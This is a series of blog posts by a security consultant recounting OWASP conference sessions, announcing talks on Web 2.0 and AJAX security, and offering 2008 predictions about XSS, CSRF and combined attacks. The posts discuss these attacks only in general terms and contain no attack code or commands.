OWASP EU Summit in Portugal: Monday

By Dan Cornell

This week I'm in Portugal at the OWASP EU Summit '08.

Just after I arrived on Monday I had the opportunity to talk about AJAX security and sprajax to a group of students at the 1 day OWASP event at the University of Algarve.  The slide deck was a shortened version of the one from when I presented at OWASP Montgomery.  I always enjoy speaking to University students because you have to work hard to frame the material in the appropriate context.  For example - how do you explain SQL injection to someone who has never written a database application?  How to explain PCI compliance to someone who has never worked inside an enterprise that takes credit cards?

I finally got some sleep Monday night after a day and a half of flights, airport wait time, presentations to University students and the conference kickoff.  This is shaping up to be a great event.  More to come.

--Dan
dan _at_ denimgroup.com

Top 5 Software Security Predictions for 2008

By Dan Cornell

Top 5 Software Security Predictions for 2008

1. More Software Security Vendor Acquisitions

As the industry matures there will be more consolidation.  As larger mainstream vendors buy up software security companies that will give software security tools further distribution, but it will not necessarily result in deeper adoption as adoption up until now has been significantly driven by independent vendor evangelism.

2. Cross Site Scripting is the New Buffer Overflow

Buffer overflows used to allow attackers to run arbitrary code on servers, where valuable data lived.  Now that most new server side applications are being written in safer languages such as .NET and Java buffer overflows are on the decline (See the changes between the OWASP Top 10 2004 and Top 10 2007).  With Web 2.0 and other trends moving more data onto the client side, hosted in browsers, the ability to run malicious code in client browsers (XSS) will become paramount for attackers.  Also cross site scripting as a class of problem encompasses many subtle variations that will persist even when obvious XSS flaws have been addressed - just like we saw with buffer overflows at attackers moved from stack overflows to heap overflows to format string attacks.

3. More Combined Attacks on the Horizon

General awareness of software security issues has improved in recent years.  Most developers these days have at least heard of SQL injection attacks, and tool adoption by large organizations has started to stem the tide of SQL injection and other simple vulnerabilities from high-profile and critical applications.  As these individual pieces become more secure, attackers will start to look for more subtle attacks.  These will involve combining different attack vectors such as SQL injection and Cross Site Scripting (XSS) The recent mass SQL injection attack that injected malicious HTML and JavaScript into databases is a good example and is a harbinger of things to come.  Also, using Cross Site Request Forgery (CSRF) attacks to weave attacks across separate applications will continue to gain steam.  As the components become more mature, more vulnerabilities will come from the interactions between these components.

4. Academia Will Start to Get In On the Act

Up to this point there has been comparatively limited work done in academia that was specifically focused on software security.  In 2008 I suspect several prominent institutions will announce software security-specific efforts.  This is great because it will hopefully start the long road toward security being taught throughout the computer science curriculum rather than as specialized add-on coursework.

5. Social Networking is Going to Have a Rough Year

With so many people becoming involved in multiple Social Networking sites, so much valuable personal data being stored in those sites and with increased programmability being made available, vulnerabilities will skyrocket as threats and countermeasures in this environment are not well understood.

2007 was a tremendously exciting year for application security and I think 2008 is going to blow it away.  Tremendous strides have been made in education, testing and countermeasures but equal if not more progress has been made by attackers as they evolve their methods and - even more importantly - their goals.

--Dan

PS - Picture is another I took in Costa Rica.  It has been LOLGuana-ed up solely to aggravate Sheridan Chambers, who hates LOLCats more than anyone I know.  Even I'm getting annoyed so I guess I ought to lay off for a while.

OWASP AppSec 2007 San Jose: Day 1

By Dan Cornell

As mentioned before, John Dickson and I are up at the OWASP AppSec 2007 San Jose conference this week.  I had a chance to attend some great sessions and talk witha  bunch of great folks today.  Here are some notes:

• The keynote speakers were Dave Cullinane and Michael Barrett from eBay and PayPal.  Michael had to run off to catch a plane, but Dave gave a great overview of the scale of the problem eBay faces trying to build a trusted platform for commerce.
• Chris Wysopal's talk about finding backdoors in software was fantastic.  It had some great analysis of backdoors discovered in software in the past and great discussion of possible signatures for static analysis tools that can help identify potential backdoors.  It is hard enough to find security vulnerabilities introduced into software accidentally - looking for backdoors intentionally crafted and inserted is just that much harder.
• Eric Sheridan's talk about Cross Site Request Forgery was very informative and I am looking forward to trying out his two new CSRF tools.
• I caught up with IBM Watchfire's Ory Segal. He gave me a demo of some of the new AppScan 7.7 features.  I have been slacking off but I finally got a copy of the beta and will be looking at it through the end of this week.  So far it looks to be pretty impressive.  I'm looking forward to the new "state inducer" feature that allows you to record more complicated workflows to get an application into a state where you can actually test it.  Think of an application with a three step process - you need to go through steps one and two before you can test the functionality at step three.  This has been a problem with scanners we have used in the past when we are testing more complicated web applications implementing multi-step processes.
• Amichai Shulman's talk about defeating Web 2.0 vulnerabilities was basically a web application firewall commercial - but I suppose that is to be expected.  He did have an excellent point that given the number of CSRF vulnerabilities that exist in existing code it is a daunting task to try to eliminate them all in code.  From that standpoint WAFs certainly do have a place in any serious application security infrastructure.
• I caught the tail-end of Robert "RSnake" Hansen's talk about browser insecurities.  OWASP is launching a Working Group to deal with browser insecurity issues and I look forward to seeing what the come up with.
• The "Building and Effective Application Security Assurance Program" panel did a good job of laying out what does and does not work when creating such programs.  Hint: don't pick a tool and think that your problems are solved.
• The OWASP Leaders meeting was a good chance to put some names with faces.  It also made me realize that the Texas chapters - San Antonio, Austin, Houston - need to do a better job of attending the OWASP national conferences.
• As always the OWASP Dinner was a great chance to relax after an day packed with great information.

So that is a wrap up of Day 1.  More info to come on Day 2.

--Dan
dan _at_ denimgroup.com

OWASP Montgomery "Web 2.0 and AJAX Security" Slide Deck Online

By Dan Cornell

The slide deck from my "Web 2.0 and AJAX Security" talk at OWASP Montgomery is up online here.  Thanks to everyone who attended.

We had some great discussions about SOA security and how mandates to be SOA-enabled by a certain date often force organizations to deploy solutions and technologies they don't really understand.  Obviously this has a negative impact on the security of these systems.

--Dan
dan _at_ denimgroup.com

Web 2.0 Security Talk At OWASP Montgomery Tomorrow

By Dan Cornell

I will be speaking at the OWASP Montgomery meeting tomorrow (Tuesday August 21st) at the Auburn University Taylor Center.  The topic is Web 2.0 and AJAX security.

--Dan
dan _at_ denimgroup.com

AJAX on Your Apple iPhone: "Secure" Development Indeed

By Dan Cornell

It looks like the folks at Apple are pretty excited about the Safari browser that will be loaded with the iPhone.  Steve Jobs has apparently promoted the browser capabilities as a way to do development for the iPhone while still keeping it "secure"  Given how completely broken the initial release of Safari was for Windows, I am not sure this will accomplish the task.

Thanks to Alan Weinkrantz for letting me know about the AJAX plans for iPhone.

--Dan
dan _at_ denimgroup.com

OWASP Houston Slide Deck on Web 2.0 Security Online

By Dan Cornell

The slide deck from the presentation I made yesterday to the inaugural OWASP Houston meeting is up online.  We had a great turnout and some great questions.  Thanks to all who attended.  Also thanks to the meeting sponsors: Microsoft (who provided the facility), Set Solutions and SPI Dynamics.

I also wanted to point interested folks to the OWASP resources I mentioned at the end of the presentation:

• OWASP main page
• OWASP AJAX Project
• OWASP Sprajax Project (written by yours truly)
• OWASP Testing Guide chapter on AJAX testing

Again thanks to everyone for coming out and I hope to see you folks at future OWASP events.  Please keep an eye on the OWASP Houston page for news on upcoming events.

--Dan
dan _at_ denimgroup.com

Google Gears and Security

By Dan Cornell

Google has announced their Google Gears tools for making online/offline web applications.  This is a great idea and I am looking forward to looking into it further.

I was kind of surprised to see that it has to run native code on the local machine.  This isn't a terrible idea - it gives you a lot more capabilities and features.  I had been hoping for a fully browser-based JavaScript datastore with online synchronization capabilities.  Something that would run without any special plugins.  This would be more limited because the browser would have to be back on the network before being closed if you wanted to persist any of the changes that had been made when offline.  Instead they are using a local copy of SQLite along with some other native code/browser plugin stuff.

From a features standpoint that allows you to make much more interesting applications.  Maintaining local-disk state that lives across browser lifetimes is super-helpful.  From a security standpoint, however, this opens up a whole can of worms.  If this framework is going to require a user to run local code attackers are not just limited to breaking current browser security protections.  They can also attack the local code that Google Gears will rely on.  This is a huge difference so we will see how things turn out.

However I was encouraged to see that they have a fledgling security page that talks about design and coding issues that could affect Google Gears applications' security.  They have a little bit of talk about their security model and a little bit of talk about things like SQL injection.  This is a good start but with such a new mentality for building web applications and so much new code in the frameworks I suspect that there will be more than a few security issues to work out - both in the framework and in the application built on top of it.

Fun stuff!

--Dan
dan _at_ denimgroup.com

Speaking at ComTech IT Conference and Expo

I will be speaking next Wednesday May 23rd at the ComTech IT Conference and Expo in New Orleans, LA.  The topic is "Security Dangers in Web Application Development – SQL Injection, AJAX, XSS"

I have not yet been back to New Orleans post-Katrina so I am curious to see how the city is doing these days.  If anyone is going to be there let me know and hopefully we can catch up.

--Dan
dan _at_ denimgroup.com

Unatek Web Services Security Conference Slide Decks Online

By Dan Cornell

The slide deck from my talk at the Unatek Web Services Security Conference on Web 2.0 Security is up online on the Denim Group presentations page.  They had their own template for the slides, but I think I like the standard Denim Group version better.

--Dan
dan _at_ denimgroup.com